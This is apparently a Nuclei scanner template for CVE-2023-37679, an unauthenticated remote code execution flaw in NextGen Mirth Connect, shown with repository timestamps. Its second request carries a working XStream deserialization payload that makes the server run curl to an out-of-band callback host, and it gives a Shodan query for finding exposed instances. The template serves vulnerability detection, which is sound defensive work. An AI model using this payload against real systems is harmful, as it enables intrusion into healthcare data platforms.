nuclei-templates/http/cves/2023/CVE-2023-37679.yaml

65 lines
2.1 KiB
YAML
Raw Normal View History

id: CVE-2023-37679
2023-10-25 18:13:45 +00:00
info:
2023-10-25 18:13:45 +00:00
name: NextGen Mirth Connect - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Mirth Connect, by NextGen HealthCare, is an open source data integration platform widely used by healthcare companies. Versions prior to 4.4.1 are vulnerable to an unauthenticated remote code execution vulnerability
reference:
- https://www.horizon3.ai/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/
- https://nvd.nist.gov/vuln/detail/CVE-2023-37679
2023-10-25 18:13:45 +00:00
classification:
cve-id: CVE-2023-37679
2023-10-25 18:13:45 +00:00
metadata:
max-request: 2
verified: true
shodan-query: title:"mirth connect administrator"
tags: cve,cve2023,nextgen,rce
http:
- raw:
- |
GET /api/server/version HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
- |
POST /api/users HTTP/1.1
Host: {{Hostname}}
X-Requested-With: OpenAPI
Content-Type: application/xml
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>curl</string>
<string>http://{{interactsh-url}}/</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>
2023-10-25 18:13:45 +00:00
matchers:
- type: dsl
dsl:
- 'compare_versions(version, "<4.4.1")'
- 'contains(interactsh_protocol, "dns")'
- 'status_code_1 == 200 && status_code_2 == 500'
condition: and
extractors:
- type: regex
part: body_1
2023-10-25 18:13:45 +00:00
name: version
group: 1
regex:
- '(.*)'
2023-10-25 18:13:45 +00:00
internal: true
# digest: 4a0a004730450221008e36cf08f81d2103e905d890bf31e0fc3f94f15eb231fd889a46d46d9cd7b18202205a5d3b1c4a8a0757dea7ab3b0c276c28dedc720c80d0179827f1ccaabc1fc305:922c64590222798bb761d5b6d8e72950